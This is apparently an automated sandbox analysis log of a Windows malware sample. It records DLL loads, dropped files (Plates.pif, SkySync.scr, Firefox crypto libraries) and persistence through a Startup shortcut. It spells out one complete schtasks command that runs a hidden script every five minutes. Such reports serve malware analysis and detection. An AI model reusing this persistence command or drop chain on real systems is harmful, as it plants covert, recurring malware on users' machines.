Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\choice.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edgegdi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edgegdi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: jscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: edgegdi.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: mozglue.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: vcruntime140.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: msvcp140.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: windows.fileexplorer.common.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: ntshrui.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: cscapi.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: linkinfo.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: pcacli.dll
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: JHPvqMzKbz.exe

Static file information: File size 1690066 > 1048576

Source: JHPvqMzKbz.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe

Code function: 0_2_004062FC GetModuleHandleA,LoadLibraryA,GetProcAddress,

0_2_004062FC

Source: freebl3.dll.39.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.39.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.39.dr	Static PE information: section name: .didat
Source: softokn3.dll.39.dr	Static PE information: section name: .00cfg
Source: nss3.dll.39.dr	Static PE information: section name: .00cfg

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: 0_3_008007BA push ebx; retn 0000h	0_3_00800915
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: 0_3_00803CFA pushfd ; ret	0_3_00803D11
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Code function: 0_3_007F529C push eax; retf 007Eh	0_3_007F529D
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AB8B75 push ecx; ret	19_2_00AB8B88

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	File created: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\646751\Plates.pif			Jump to dropped file

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	File created: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	File created: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Jump to dropped file
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Jump to dropped file
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	File created: C:\ProgramData\chrome.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Boot Survival

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe	Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Uses schtasks.exe or at.exe to add and modify task schedules

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Enjoy" /tr "wscript //B 'C:\Users\user\AppData\Local\SkySync Technologies\SkySync.js'" /sc minute /mo 5 /F

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SkySync.url

Jump to behavior

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00B159B3 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,		19_2_00B159B3
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Code function: 19_2_00AA5EDA GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,		19_2_00AA5EDA

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Code function: 19_2_00AB33B7 EncodePointer,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

19_2_00AB33B7

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\JHPvqMzKbz.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\tasklist.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process information set: FAILCRITICALERRORS \| NOALIGNMENTFAULTEXCEPT \| NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Process information set: NOALIGNMENTFAULTEXCEPT \| NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\schtasks.exe	Process information set: NOOPENFILEERRORBOX

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer
Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer

Source: C:\Users\user\AppData\Local\SkySync Technologies\SkySync.scr	Dropped PE file which has not been started: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\646751\Plates.pif	Dropped PE file which has not been started: C:\ProgramData\chrome.dll	Jump to dropped file
